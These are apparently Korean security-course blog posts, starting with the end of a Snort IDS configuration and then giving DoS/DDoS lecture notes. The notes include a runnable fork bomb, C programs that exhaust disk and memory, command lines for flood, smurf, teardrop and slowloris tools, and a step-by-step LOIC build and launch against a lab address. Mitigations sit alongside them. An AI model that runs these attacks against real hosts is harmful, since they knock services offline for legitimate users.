
include $RULE_PATH/web-php.rules

include $RULE_PATH/x11.rules

###################################################

# Step #8: Customize your preprocessor and decoder alerts

# For more information, see README.decoder_preproc_rules

###################################################

# decoder and preprocessor event rules

# include $PREPROC_RULE_PATH/preprocessor.rules

# include $PREPROC_RULE_PATH/decoder.rules

# include $PREPROC_RULE_PATH/sensitive-data.rules

###################################################

# Step #9: Customize your Shared Object Snort Rules

# For more information, see

# http://vrt-blog.snort.org/2009/01/using-vrt-certified-shared-object-rules.html

###################################################

# dynamic library rules

# include $SO_RULE_PATH/browser-ie.rules

# include $SO_RULE_PATH/browser-other.rules

# include $SO_RULE_PATH/browser-plugins.rules

# include $SO_RULE_PATH/exploit-kit.rules

# include $SO_RULE_PATH/file-executable.rules

# include $SO_RULE_PATH/file-flash.rules

# include $SO_RULE_PATH/file-image.rules

# include $SO_RULE_PATH/file-java.rules

# include $SO_RULE_PATH/file-multimedia.rules

# include $SO_RULE_PATH/file-office.rules

# include $SO_RULE_PATH/file-other.rules

# include $SO_RULE_PATH/file-pdf.rules

# include $SO_RULE_PATH/indicator-shellcode.rules

# include $SO_RULE_PATH/malware-cnc.rules

# include $SO_RULE_PATH/malware-other.rules

# include $SO_RULE_PATH/netbios.rules

# include $SO_RULE_PATH/os-linux.rules

# include $SO_RULE_PATH/os-other.rules

# include $SO_RULE_PATH/os-windows.rules

# include $SO_RULE_PATH/policy-social.rules

# include $SO_RULE_PATH/protocol-dns.rules

# include $SO_RULE_PATH/protocol-icmp.rules

# include $SO_RULE_PATH/protocol-nntp.rules

# include $SO_RULE_PATH/protocol-other.rules

# include $SO_RULE_PATH/protocol-snmp.rules

# include $SO_RULE_PATH/protocol-voip.rules

# include $SO_RULE_PATH/pua-p2p.rules

# include $SO_RULE_PATH/server-apache.rules

# include $SO_RULE_PATH/server-iis.rules

# include $SO_RULE_PATH/server-mail.rules

# include $SO_RULE_PATH/server-mysql.rules

# include $SO_RULE_PATH/server-oracle.rules

# include $SO_RULE_PATH/server-other.rules

# include $SO_RULE_PATH/server-webapp.rules

# legacy dynamic library rule files

# include $SO_RULE_PATH/bad-traffic.rules

# include $SO_RULE_PATH/browser-ie.rules

# include $SO_RULE_PATH/chat.rules

# include $SO_RULE_PATH/dos.rules

# include $SO_RULE_PATH/exploit.rules

# include $SO_RULE_PATH/file-flash.rules

# include $SO_RULE_PATH/icmp.rules

# include $SO_RULE_PATH/imap.rules

# include $SO_RULE_PATH/misc.rules

# include $SO_RULE_PATH/multimedia.rules

# include $SO_RULE_PATH/netbios.rules

# include $SO_RULE_PATH/nntp.rules

# include $SO_RULE_PATH/p2p.rules

# include $SO_RULE_PATH/smtp.rules

# include $SO_RULE_PATH/snmp.rules

# include $SO_RULE_PATH/specific-threats.rules

# include $SO_RULE_PATH/web-activex.rules

# include $SO_RULE_PATH/web-client.rules

# include $SO_RULE_PATH/web-iis.rules

# include $SO_RULE_PATH/web-misc.rules

# Event thresholding or suppression commands. See threshold.conf

include threshold.conf

[참고] Snort에 대해서 더 공부해야할 사항들

다음 사항들에 대해서 별도의 study가 필요하다.

● snort rules generate => tools

● snort(IDS) + preventing => IPS

● snort -> DB -> WEB => tools

■ 참고 동영상(반드시 참고해 주세요)

Snort - NIDS on CentOS 6.5 - part 1/4

● http://www.youtube.com/watch?v=DYBfCyd6cC0

Snort - NIDS on CentOS 6.5 - part 2/4

● http://www.youtube.com/watch?v=frmZWsjPBZ8

Snort - NIDS on CentOS 6.5 - part 3/4

http://www.youtube.com/watch?v=QBwwhIBav38

Snort - NIDS on CentOS 6.5 - part 4/4

● http://www.youtube.com/watch?v=II80tzwEuFk

■ Snort 룰 생성기(Snort Rule Generator)

● Snort Rule Generator 사용법에 대한 유투브 동영상
http://www.youtube.com/watch?v=4Eb8S-NK6f4

● 프로그램 다운로드
http://dl.dropbox.com/u/4864067/snort-rules.zip

● Snort Rule Generator 사용법

다음과 같은 실습을 개인적으로 진행하고 분석 보고서를 작성한다.

[실습1] 스캐닝(scanning)에 대한 snort 점검 확인

- nmap 수행결과 snort 쪽에서 확인

[실습2] 플러딩 공격(flooding attack)에 대한 snort 점검 확인

- hping3 수행 결과 snort 쪽에서 확인

[실습3] 도스 공격(dos attack)에 대한 snort 점검 확인

- pyloris-3.2 버전 수행결과 snort 쪽에서 확인

- loic 툴로 공격에 대한 snort 쪽에서 확인

ruleResult.rules

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160824 Snort on CentOS6.X (수정) (0)	2016.08.24
20160823 Snort on CentOS6.X (0)	2016.08.23
20160822 DoS, DDoS, SNORT (0)	2016.08.23
20160822 NAS(Network Attached Storage) (0)	2016.08.22
20160819 프로젝트#4 + 피드백 (0)	2016.08.19

Posted by 22Hz

, |

20160822 DoS, DDoS, SNORT

모의해킹 침해대응 전문가 과정 / 2016. 8. 23. 17:06

DoS(Denial of Service) & DDoS(Distributed DoS)

■ 보안 이슈 관련 단어

DoS/DDoS, DB Attack, APT Attack , SPAM MAIL, WEB Hacking, Wireless Hacking

+ Big Data Security + IoT Security

■ 이전에 배운 과정들에 대한 정리

DoS/DDoS ---> Firewall ---> IPS/IDS ---> WAF ---> WEB Server(SELinux)

1. DoS & DDoS 용어

DoS(Denial of Service) 공격(1:1)

● 서비스 거부 공격: 공격자가 호스트의 H/W 또는 S/W 등을 무력하게 만들어 호스트에서 적법한 사용자의 서비스 요구를 거부하도록 만드는 일련의 과정이다.

DDoS(Distributed Denial of Service) 공격(N:1)

● 분산 서비스 거부 공격: 네트워크로 연결된 분산 환경에서 여러대의 컴퓨터를 이용하여 한대의 공격대상 시스템에 대한 DoS 공격 ( EX: BotNet )

2. DoS 공격의 특징

● 관리자 권한(EX: root)을 획득하는 것이 아니다.

● 데이터를 파괴 혹은 변조 혹은 훔쳐가는 것을 목적으로 하지 않는다.

● 공격의 원인이나 공격자를 추적하기 힘들다.

● 공격시 해결하기 힘들다.

● 매우 다양한 공격 방법들이 가능하다.

● 같은 공격에 대해서 각 시스템마다 결과가 다르게 나타날수 있다.

● 다른 공격을 위한 사전 공격으로 사용될수 있다.

● 사용자의 실수로 발생될수 있다.

● 금전을 요구하는 사회 범죄 형태로 전이 되었다.

3. DoS 공격의 유형

(1) 내부 공격

공격의 형태

● 시스템이 보유하고 있는 리소스를 점유하거나 모두 고갈시킴으로서 시스템 마비 발생

● 계정을 가진 내부 사용자에 의해 발생(EX: 로컬 계정을 가진 악의적인 사용자)

● 고의보다는 실수로 인해 발생(EX: 개발자에 의한 경우)

공격의 종류

● 디스크 채우기(EX: 디스크 full)

● 메모리 고갈(EX: 메모리 leak)

● 프로세스 만들기(EX: 많은 프로세스 생성)

(2) 외부 공격

공격의 형태

● 특정 포트를 사용하는 서비스를 마비 시킴(EX: 서비스 거부 공격)

● 네트워크 기능 자체를 오동작 시킴

공격의 종류

● 응용 프로그램 수준
- Mail Bomb
- Buffer Overflow
- Java Applet Attack

● 프로토콜 수준
- SYN Flooding
- Ping Flooding
- Smurfing Attack

● 네트워크 수준
- UDP Storming
- 네트워크 Bandwidth 공격

4. 트래픽 구성에 따른 DDoS 공격 유형 분석

순위	프로토콜	공격유형	점유율
1	UDP	악성 IRC Bot Flooding Source Spoofing	70% 5%
2	ICMP	Fragementation Attack	10%
3	Garbage Packet	Opentear, Fragement	7%
4	Service Attack	GET/POST DDoS Attack	8%

-> UDP를 통한 악성 IRC BOT 공격이 DDoS의 주류를 이루고 있고, 프로토콜 중 UDP가 전체 DDoS에 약

70% 이상이다..

■ 공격 구분 - 피해 대상별

구분	접속량 증가			대용량 트래픽전송
구분	PPS Consuming	Connection Consuming	Application Consuming	Bandwidth/Infra Consuming
프로토콜	TCP (Non-handshake)	TCP (Handshake)	HTTP, DNS, VoIP, DHCP	UDP/ICMP
공격PC위치	국내/국외	국내/국외	국내/국외	국내
IP변조여부	변조/실제 IP	실제 IP(Zombie)	실제 IP(Zombie)	변조/실제 IP
공격유형	64 bytes 이하 수십/백만 PPS	64 bytes 수십/백만 PPS	http cache-control DNS Query Flooding 등	1000 ~ 1500 bytes 수십만 PPS
공격효과	네트워크 장비, 보안 장비, 서버 등의 부하 발생	웹 서버 접속 고갈 발생	서버 접속 고갈 발생	회선 대역폭 초과
피해시스템	공격 대상 시스템 또는 동일 네트워크에서 사용 중인 모든 시스템	공격 대상 서버	Application	동일 네트워크에서 사용중인 모든 시스템

■ 서버 기반 DDoS 공격

(예전)

● 접속량 고갈(L7 공격) => 서버/응용프로그램

● 응용 계층 공격
- http request flooding, CC Attack, VoIP 등 특정 응용층에 대한 공격으로 정당한 사용자의 서
비스를 제한
- 공격(대상응용계층만 서비스 제한, 동일네트워크내의 시스템은 정상
- 공격 트래픽의 양이 매우적고, 다른 응용계층은 정상 동작

(현재)

● 접속량 고갈(L7 공격) + 대역폭 고갈(L4 공격) => 네트워크/응용/인프라

● 응용/인프라 계층 공격
- http request bomb, DDoS evasion attack
- 응용계층 공격에 비정상적인 데이터 필드를 더하여 공격
- Real IP를 이용하여 최초 정상 Handshake 후 대량 공격
- 공격 트래픽의 양이 매우 많고, 모든 인프라 파괴
- 다중 Flow(Mixed Attack)이 아닌 싱글 Flow로 효과 증대

■ 대역폭(네트워크 회선) 기반 DDoS 공격

(예전)

● 대역폭 고갈(L3/L4 공격) => 네트워크/인프라

● L3/L4 계층 공격
- UDP/ICMP Flooding
- 네트워크/인프라를 공격하여 모든 외부의 요청을 차단 및 지연 시키는 특성
- 공격 대상 서비스 제한, 동일 네트워크내의 시스템 제한
- 공격트래기의 양이 매우 많고, 모든 계층의 통신 불능 상태 유발

(현재)

● 실존트래릭 유사(L3/L4 공격) + 대역폭 고갈 => 네트워크/응용/인프라
- Real dump attack, DDoS Evasion Attack
- UDP, ICMP Fragementation Attack으로 전이
- VoIP의 경우 실제 패킷과 동일한 수준의 패킷을 대량 전송
- DNS의 경우 정상쿼리 전송
- L3/L4에서 응용계층으로 공격 전이

5. 공격 방법 기술 분석

■ UDP DDoS Attack Sample

-> 1000 bytes 데이터

■ ICMP DDoS Attack Sample

-> 1480 bytes 데이터

■ Syn Flood DDoS Attack Sample

-> 헤더만 존재

■ No-cache Get Flood DDoS Attack Sample

-> 헤더만 존재

■ Data + Ack Flooding DDoS Attack Sample

-> 데이터만 존재

소스 IP/Port = 랜덤(random)

목적 IP/Port = 고정

데이터 = 삽입(1460 bytes)

■ Connection + Syn Flooding DDoS Attack Sample

-> 헤더만 존재

No-cache Get Food

Syn Flooding

6. 공격 방법 구현 실습

■ Local Attack(System Resource Exhaustion Attack)

● 공격 기법(디스크 자원 고갈)

● 공격 원리
- 임의의 파일을 생성한 후 계속해서 파일의 크기를 증가 시켜 디스크를 쓸모 없는 데이터로 채우는 공격기법

● 공격 코드 및 실행 방법

# vi disk_attack.c

#include <unistd.h>

#include <sys/file.h>

void main()

{

int attack;

char buf[10000];

attack = create("root/temfile",0777);

while(1)

write(attack,buf,sizeof(buf));

}

# gcc -o disk_attack disk_attack.c

# ./disk_attack

● 해결점
- 문제의 프로세스를 찾아 종료
- 각 사용자에 대한 quota 설정
- 공용 디렉토리(/tmp, /var/tmp)에 대하여 독립적인 파티션으로 구성

■ Local Attack(System Resource Exhaustion Attack)

● 공격 기법(메모리 고갈)

● 공격 원리
- 하나의 프로세스가 시스템에서 사용 가능한 모든 메모리 리소스를 고갈시킴으로서 시스템을 마비시키는 공격 기법

● 공격 코드 및 실행 방법

# vi memory_attack.c

#include <stdio.h>

void main()

{

char *c;

while(1)

c=malloc(1000);

}

# gcc -o memory_attack memory_attack.c

# ./memory_attack

● 해결책
- 각 사용자에 대한 최대 메모리 사용량을 제한한다.
- ulimit CMD, /etc/security/limits.conf

■ Local Attack(System Resource Exhaustion Attack)

● 공격 기법(프로세스 자원 고갈)

● 공격 원리
- 프로세스를 계속 만들어서 시스템 리소스를 고갈시킴으로서 시스템을 마비시키는 공격 기법

● 공격 코드 및 실행 방법

# vi process_attack.c

#include <stdio.h>

#include <unistd.h>

void main()

{

while(1)

fork();

}

# gcc -o process_attack process_attack.c

# ./process_attack

● 해결책
- 사용자마다 생성 가능한 최대 프로세스의 수를 제한한다.
- ulimit CMD, /etc/security/limits.conf

■ Remote Attack

● 공격 기법(SYN Flooding 공격)

● 공격 원리
- IP Spoofing을 이용하여 half-open TCP 연결을 시도하여 상대 호스트의 Listening Queue를 고갈 시키는 방법
- [그림] 공격에 대한 예제 그림

● SYN Flooding 공격에 대해서
- Syn Flooding 공격은 TCP 프로토콜의 연결 설정 절차의 설계상의 취약성으로 인해 발생되는 것으로서 이에 대한 완전한 해결책은 없다고 봐야 한다.
- 피해를 감애하거나 최소화 하기 위햐서 Anti DDoS 솔류선이나 거대 백본을 가진 Secure IDC로 서버들을 이전하여 임시 대응하는 상황이다.(Real-DDoS의 경우 또는 Spoofed DDoS)

● 공격용 툴
(윈도우용) Hgod(http://www.cnhonker.com)
     Hgod 툴의 기능
     - Spoofed/Non Spoofed Syn Flooding
     - Spoofed/Non Spoofed UDP Flooding
     - Spoofed/Non Spoofed ICMP/IGMP Flooding
     - DrDoS
(리눅스용) Synk4(http://packetstorm.security.com/new-exploits/synful.c)
                (http://user.cs.tu-berlin.de/~tqiu/exploits/synk4.c)

● 해결책
- 백 로그 큐의 크기를 증가, Half-Open Time을 적게 한다.

# netstat -an

or

wireshark 패킷 캡쳐

■ Remote Attack

● 공격기법(Ping of Death)

● 공격 원리
- ping을 이용하여 ICMP 패킷을 정상적인 크기보다 매우 크게 만들어 네트워크를 통과할 때 공격 네트워크에 도달하기 위해서는 단편화(Fragementation)이 되는데 이러한 경우 공격 대상 시스템은 이렇게 작은 조각 패킷을 처리하기 위하여 많은 로드가 발생되게 되는데 이른 노린 공격 방법이다.
# ping -n 10000 -l 65500 <Vitim's IP>

■ Remote Attack

● 공격기법(ICMP Smurfing)

● 공격 원리
- ICMP 프로토콜과 IP Broadcast 주소를 이용한 공격 기법
- Broadcast 로의 echo request를 보내 대량의 echo reply를 임의의 주소로 집중 전송되게 하는 원리
- [그림] 공격에 대한 예제 그림

● 공격용 툴
smurf.c(http://packetstormsecurity.org/DoS/spike.sh.zip)
Hgod 프로그램을 사용하여 소스를 공격 대상 IP로 설정(IP Spoofing) 하고 대상자 네트워크를 공격하여야 한다.
# ./smurf <Victim's IP> bcastfile 0 5 64

● 해결책
- Smurfing의 차단 방법은 모든 라우터의 내부(LAN쪽) interface 마다 Directed Broadcast 기능을 막아 준다.
- 자신의 내부 측(EX: 192.168.0.255)의 주소로 ICMP echo의 요청이 들어가지 못하도록 한다.

■ Remote Attack

● 공격기법(Bonk/Boink, Teardrop)

● 공격원리
- 여러가지 프로토콜은 기본적으로 신뢰성을 높이고자 하는 목적을 가지고 있다. 신뢰성은 다음의 세가지로 크게 생각할 수 있다.
     * 패킷의 순서가 올바른가?
     * 중간에 손실된 패킷은 없는가?
     * 손실된 패킷의 재전송 요구
- Bonk/Boink, TearDrop은 위의 사항을 위반함으로써 공격 대상 시스템에 DoS 공격을 가하게 된다.
- (Bonk 공격) Bonk는 처음 패킷을 1번으로 보낸 후 두번째, 세번째 패킷 모두 시퀀스 넘버를 1번으로 조작하여 공격
- (Boink 공격) Bonk의 개량 버전인 Boink는 처음 패킷을 1번으로 보낸 후 두번째 패킷은 101번, 세번째 패킷은 201번으로 정상적으로 보내다가 중간에서 일정한 시퀀스 넘버로 보낸 후 열번째 패킷은 1001번, 열한번째 패킷도 1001번, 열두번째 패킷도 1001번으로 전송
- (TearDrop 공격) TearDrop은 패킷을 겹치게 또는 일정한 간격의 데이터가 빠지게 전송한다. Teardrop은 IP 패킷의 전송이 잘게 나누어졌다가 다시 재 조합하는 과정의 약점을 악용한 공격이다. 보통 IP 패킷은 하나의 큰 자료를 잘게 나누어서 보내게 되는데 이때 offset을 이용하여 나누었다가 도착지에서 offset을 이용하여 재 조합하게된다. 이때 동일한 offset을 겹치게 만들면 시스템은 교착되거나 충돌을 일으키거나 재기동된다. 과거 윈도우 95 버전에서 발생되었던 문제이다. 그러나 현재도 네트워크나 시스템에 큰 오버헤드를 발생시킨다.
- [그림] 공격에 대한 예제 그림

정상적인 패킷 전송

==============================================================================

시퀀스번호 (1) (101) (201) (301) (401)

| | | | |

|<-----> | | | |

| |<-----> | | |

| | |<-----> | |

| | | |<-----> |

| | | | |

==============================================================================

비정상적인 패킷 전송

==============================================================================

시퀀스번호 (1) (101) (201) (301) (401)

| | | | |

|<-----> | | | |

| <-------> | | |

| (81) | (181)| (221) | (321) |

| | | <-----> |

| | | <-------> |

| | | (251)| (351) |

==============================================================================

● 공격방법
# ./newtear <공격IP> <대상IP> -s <소스포트> -t <대상포트> -n <공격개수>

■ Remote Attack

● 공격기법(LAND Attack) ( loop )

● 공격원리
- 패킷을 전송할 때 출발지 IP 주소와 목적지 IP 주소값을 공격자의 IP 주소값으로 똑같이 만들어서 공격 대상에게 보낸다. 시스템은 처음 시도된 Syn에 대한 Reply 패킷을 출발지 IP 주소 값을 참조하여 그 값을 목적지 IP 주소 값으로 설정하여 패킷을 보낸다. 하지만 이 값은 자기 자신의 IP 주소 값이므로 네트워크 밖으로 나가지 않고 자신에게 다시 돌아온다. 이 공격 방법은 Syn Flooding 처럼 동시 사용자 수를 점유 해버리며 CPU 부하까지 올리게 된다.
- [그림] 공격에 대한 예제 그림

● 공격방법
- synk4를 이용하여 소스와 목적지 주소를 동일하게 세팅하여 공격
# ./synk4 192.168.1.100 30 1024 192.168.1.100 21
-> wireshark 패킷 캡쳐 분석

■ Remote Attack

● 공격기법(Win Nuke)

● 공격원리
- 상대방 시스템에 139번 포트를 스캔하여 열려 있는지 확인하고 NetBIOS 패킷에 URG(Urgent)를 On 상태로 하여 패킷을 전송한다. URG가 On 상태는 송수신 중간에 발생할 수 있는 비정상적인 상태를 의미한다. 서비스 중 <CTRL + Break> 또는 <CTRL + C>와 같은 역할을 한다.
- 공격 대상은 수 많은 Urgent 패킷을 인식하고 모든 시스템의 세션을 닫은 뒤 재 연결을 요구하게 된다. 이때 CPU에 과부하가 걸리게 된다. 이 공격은 심한 경우 시스템이 손상되기도 한다.

● 공격툴
- Wnuke5(winnuke.c)

● Win Nuke 공격에 대해서
- 일반적으로 Out-of-band 플래그가 Padding된 패킷을 전송하게 되는데 윈도우 NT 박스 계열에서는 TCPIP.sys 모듈에서 Stop 0x0000000A를 발생 시키며 중단된다.

■ Remote Attack

● 공격기법(UDP Flooding) - 현재도 공격가능

● 공격원리
- 대역폭 고갈을 위한 공격을 가장 많이 사용되는 DoS, DDoS 공격이다. UDP Body에 Garbage Data를 Padding 하여 공격한다.

● 공격툴
- UDP Flooder 2.00

■ Remote Attack

● 공격기법(Out of Band Flooding)

● 공격원리
- 일반적인 TCP/IP 세션을 연결하기 위한 과정에서 발생하는 TCP Flag를 제외하거나 비정상적인 순서로 발생되는 Flag의 조합을 통한 DDoS, DoS 해킹 공격

● 공격툴
- stream3.c
     stream3.c 기능
     * SYN Flooding
     * NULL Flooding
     * FIN　Flooding
     * ACK Flooding
     * PUSH Flooding
     * RST Flooding
     * FIN/ACK Flooding
     * XMAS Flooding

■ Remote Attack

● 공격기법(DDoS Ping)

● 공격원리

● 공격툴
- DDoSPing 1.03(Trinoo)

■ Remote Attack

● 공격기법(Mail Bomb) - 현재도 많이 사용된다.

● 공격원리
- Mail Bomb은 흔히 폭탄 메일이라고 한다. 스팸 메일도 이와 같은 종류이다. 메일서버는 각 사용자에게 일정한 양의 디스크 공간을 할당하는데, 메일이 폭주하여 디스크 공간을 가득 채우면 정작 받아야 하는 메일을 받을 수 없게 된다. 이때문에 스팸 메일은 DoS 공격이 될수 있다.

● 공격툴
- 윈도우용 Mail Bomber Upyours(Digital Dominace(c) 1997 -=Glbal kOS=-- [Up Yours 4.0])

■ Remote Attack

● 공격기법(Checksum Error Flodding)

● 공격원리
- Checksum은 패킷내에 하나의 필드로 구성하며 데이터를 이진수(Binary Number)의 연속으로 간주하여 그 이진수의 합을 계산하는 방법이다. 예를 들어 16 bits checksum을 사용하는 경우 데이터를 16 bits씩 나누어 16진수로 표현한 다음 그 합을 계산하여 16으로 나눈 나머지에 해당되는 값을 checksum으로 사용하는 방법이다.
- 정확하지 않은 checksum값을 대량으로 보내 시스템이나 네트워크에 성능(Performance)에 영향을 미친다.

-----------------------------------

h e l l o w o r l d .
-----------------------------------
48 65 6c 6c 6F 20 77 6F 72 6C 64 2E

-----------------------------------

4865 + 6C6C + 6F20 + 776F + 726C + 642E + carry = 71FC

● 공격툴
- 윈도우용 Mail Bomber Upyours(Digital Dominace(c) 1997 -=Glbal kOS=-- [Up Yours 4.0])

■ Remote Attack

● 공격기술(IP Checksum Error)

● 공격원리
- IP 헤더의 checksum 값이 틀린 패킷을 다량으로 보내서 대상 서버를 다운시키거나 정상적인 서비스가 불가능하게 한다.

● 공격방법
# ./ipchksum <소스IP> <타켓IP> <포트>

■ Remote Attack

● 공격기술(ICMP Checksum Error)

● 공격원리
- ICMP 헤더의 checksum 값이 틀린 패킷을 다량으로 보내서 대상 서버를 다운시키거나 정상적인 서비스가 불가능하게 한다.

● 공격방법
# ./icmpchecksum <소스IP> <타켓IP> <포트>

■ Remote Attack

● 공격기술(UDP checksum Error)

● 공격원리
- UDP 헤더의 checksum 값이 틀린 패킷을 다량으로 보내서 대상 서버를 다운시키거나 정상적인 서비스가 분가능하게 한다.

● 공격 방법
# ./udpchksum <target> <bcast file> <num packets> <packet delay> [dstport] [srcport] [psize]

■ Remote Attack

● 공격기술(botnet)

● 공격원리
- Robot의 줄임말로 감염된 컴퓨터(Zombie, Hacker Army, troop)는 공격자(Bot Master, Bot C & C)에 의해 조종됨. 취약한 서버들이 주로 C & C(Command and Control Server)로 악용
- 악성 프로그램 유포, 피싱/SPAM 메일 방송, 개인정보 유출, AdWare 및 SpyWare 설치, 서비스 거부 공격(DoS)등 수행

공격자 -----+-----> 공격자 명령 전달 서버

+-----> 공격자 명령 전달/파일 다운로드 서버

|

V

좀비(Zombie PC) ......

|

V

타겟시스템(Target)

■ Remote Attack

● 공격기술(Netbot Attack)

● 공격원리
- 중국발 Ransom(금전요구형) DDoS 공격 툴로 널리 알려진 툴이다.
- 서버와 빌더로 이루어져 있어 빌더로 악성코드를 제작하면 서버에 좀비처럼 통제가 가능하게 된다.
- 국내 게임, 포탈등 다양한 사이트들에 대한 공격이 이루어졌다.

● 공격툴
- NB5.5Build.exe(NB 5.5)
- NetBot_Cn.exe

■ Remote Attack

● 공격기술(TCP Slow Attack) - 지금도 공격이 가능하다.

● 공격원리
- TCP Slow Attack은 2009년 7월7일 있었던 7.7 대란에 사용되었던 기법으로 여러대의 좀비 PC들이 소량의 TCP 접속만을 전송하여 정상과 비정상적인 TCP 세션 요청을 구분하기 어렵게 시도하던 공격의 일환

● 공격툴
- 윈도우용 Perl 설치(Active Perl)
- www.perlmania.or.kr:8949/pmdocs/kys/perlstart.html
- # perl sloworis.pl -dns 192.168.0.100

■ Remote Attack

● 공격기술(HTTP Get Flooding)

● 공격원리
- HTTP 서비스를 제공하고 있는 웹 서버에 직접적인 영향을 비치는 공격방법으로 다량의 접속 요청을 보내서 정상적인 접속을 요청하는 사용자들의 접속을 방해하는 공격이다.
- 1514바이트 최대 크기로 대상 사이트 공격, 데이터 영역의 문자열은 적당한 것을 사용하면 된다.

● 공격툴
- Low ORbit Lon Cannon(lolc)

[실습] LOIC(Low Orbit Ion Cannon) 툴을 사용한 DoS Attack 실습

저궤도 이온포(Low Orbit Ion Cannon)

● 네트워크 스트레스 테스트 툴이다.

● 이 소프트웨어는 많은 공공기관을 포함한 여러 웹사이트에 분산 서비스 공격을 편하게 사용할 수 있게 도와주며, anonymous에 의해 사용되면서 유명하게 되었다.

Window 2008에서 실습했음. ( dotnetframework -> LOIC )

(KaliLinux)

# apt-get update

# apt-get install git git-core monodevelop mono-mcs mono-dmcs

Couldn't find any package whose name or description matched "mondodevelop"

The following NEW packages will be installed:

git-core

The following packages will be REMOVED:

libafpclient0{u} libcrypt-passwdmd5-perl{u} libmozjs24d{u} libnet-daemon-perl{u}

libplrpc-perl{u} memtest86+{u} syslinux-themes-debian{u}

syslinux-themes-debian-wheezy{u} xulrunner-24.0{u}

0 packages upgraded, 1 newly installed, 9 to remove and 39 not upgraded.

Need to get 1,336 B of archives. After unpacking 55.9 MB will be freed.

Do you want to continue? [Y/n/?] Y

Get: 1 http://http.kali.org/kali/ kali/main git-core all 1:1.7.10.4-1+wheezy1 [1,336 B]

Fetched 1,336 B in 7초 (180 B/s)

(데이터베이스 읽는중 ...현재 366570개의 파일과 디렉터리가 설치되어 있습니다.)

..... (중략) .....

* Installing 5 assemblies from libnunit2.6-cil into Mono

libnunit-cil-dev (2.6.0.12051+dfsg-2) 설정하는 중입니다 ...

monodoc-base (2.10.8.1-8+deb7u1) 설정하는 중입니다 ...

monodevelop (3.0.3.2+dfsg-1) 설정하는 중입니다 ...

libmono2.0-cil (2.10.8.1-8+deb7u1) 설정하는 중입니다 ...

libmono-cil-dev (2.10.8.1-8+deb7u1) 설정하는 중입니다 ...

mono-devel (2.10.8.1-8+deb7u1) 설정하는 중입니다 ...

update-alternatives: using /usr/bin/mono-csc to provide /usr/bin/cli-csc (c-sharp-compiler) in 자동 모드

update-alternatives: using /usr/bin/resgen to provide /usr/bin/cli-resgen (resource-file-generator) in 자동 모드

update-alternatives: using /usr/bin/al to provide /usr/bin/cli-al (assembly-linker) in 자동 모드

update-alternatives: using /usr/bin/sn to provide /usr/bin/cli-sn (strong-name-tool) in 자동 모드

menu에 대한 트리거를 처리하는 중입니다 ...

-> 설치 에러가 발생하면 다시 실행하면 된다.

# mkdir /loic

# cd /loic

# wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

-> 출력 내용 생략

# vi loic.sh

#!/bin/bash

#

# This script installs, updates and runs LOIC on Linux.

#

# Supported distributions:

# * Ubuntu

# * Debian

# * Fedora

#

# Usage: bash ubuntu_loic.bash <install|update|run>

#

GIT_REPO=http://github.com/NewEraCracker/LOIC.git

GIT_BRANCH=master

DEB_MONO_PKG="monodevelop liblog4net-cil-dev"

FED_MONO_PKG="mono-basic mono-devel monodevelop mono-tools"

..... (중략) ....

case $1 in

install)

compile_loic

;;

update)

update_loic

;;

run)

run_loic

;;

*)

echo "Usage: $0 <install|update|run>"

;;

esac

[참고] 필요하면 명령어 수행

# apt-get update

# apt-get upgrade

# apt-get install monodevelop mono-gmcs

[참고] 2016년 06월27일 현재 패키지가 변경되었다.

# apt-get install mono-xbuild mono-devel mono-mcs

# chmod 777 loic.sh

# ./loic.sh

Usage: ./loic.sh <install|update|run>

# ./loic.sh install (# bash loic.sh)

/usr/bin/git

MonoDevelop Build Tool

Loading solution: /loic/LOIC/LOIC.sln

Loading projects ..

Building Solution: LOIC (Debug)

Building: IRC (Debug)

Performing main compilation...

WARNING: Assembly 'log4net, Version=1.2.10.0, Culture=neutral,

PublicKeyToken=1b44e1d426115821, processorArchitecture=MSIL' not found. Make sure

that the assembly exists in disk. If the reference is required to build the project

you may get compilation errors.

/usr/bin/gmcs /noconfig "/out:/loic/LOIC/bin/Debug/IRC.dll"

"/r:/usr/lib/mono/2.0/System.dll" "/r:/usr/lib/mono/2.0/System.Core.dll" /nologo

/warn:4 /debug:full /optimize- /codepage:utf8 /platform:x86 "/define:DEBUG;TRACE"

/t:library "/loic/LOIC/IRC/Client/Channel.cs" "/loic/LOIC/IRC/Client/ChannelUser.cs"

"/loic/LOIC/IRC/Client/Delegates.cs" "/loic/LOIC/IRC/Client/EventArgs.cs"

"/loic/LOIC/IRC/Client/IrcClient.cs" "/loic/LOIC/IRC/Client/IrcMessageData.cs"

..... (중략) .....

Building: LOIC (Debug)

Performing main compilation...

Compiling resource /loic/LOIC/frmMain.resx with /usr/bin/resgen2

Compiling resource /loic/LOIC/frmWtf.resx with /usr/bin/resgen2

Compiling resource /loic/LOIC/Properties/Resources.resx with /usr/bin/resgen2

/usr/bin/gmcs /noconfig "/out:/loic/LOIC/bin/Debug/LOIC.exe"

"/r:/usr/lib/mono/2.0/System.dll" "/r:/usr/lib/mono/2.0/System.Drawing.dll"

"/r:/usr/lib/mono/2.0/System.Windows.Forms.dll" "/r:/loic/LOIC/bin/Debug/IRC.dll"

"/r:/usr/lib/mono/2.0/System.Core.dll" /nologo /warn:4 /debug:full /optimize-

"/win32icon:/loic/LOIC/LOIC.ico" /codepage:utf8 /platform:x86 /main:LOIC.Program

/t:winexe "/loic/LOIC/frmMain.cs" "/loic/LOIC/frmMain.Designer.cs"

"/loic/LOIC/frmWtf.cs" "/loic/LOIC/frmWtf.Designer.cs" "/loic/LOIC/HTTPFlooder.cs"

"/loic/LOIC/Program.cs" "/loic/LOIC/Properties/AssemblyInfo.cs"

"/res:/loic/LOIC/frmMain.resources,LOIC.frmMain.resources"

"/res:/loic/LOIC/frmWtf.resources,LOIC.frmWtf.resources"

"/res:/loic/LOIC/Properties/Resources.resources,LOIC.Properties.Resources.resources"

"/loic/LOIC/Properties/Resources.Designer.cs" "/loic/LOIC/XXPFlooder.cs"

Compilation succeeded - 1 warning(s)

/loic/LOIC/frmMain.cs(180,59): warning CS0219: The variable `ipHost' is assigned but

its value is never used

Build complete -- 0 errors, 1 warning

# ./loic.sh update

/usr/bin/git

Current branch master is up to date.

/usr/bin/git

MonoDevelop Build Tool

Loading solution: /loic/LOIC/LOIC.sln

Loading projects ..

# ./loic.sh run

-> 사용방법에 대해서는 인터넷을 참고한다.

-> youtube.com 동영상을 참고한다.

"1. Select your target" 부분
URL: http://192.168.20.200

-> Lock on

"2.Attack options" 부분

Method: HTTP

"3. Ready?" 부분

"IMMA CHARGIN MAH LAZER"

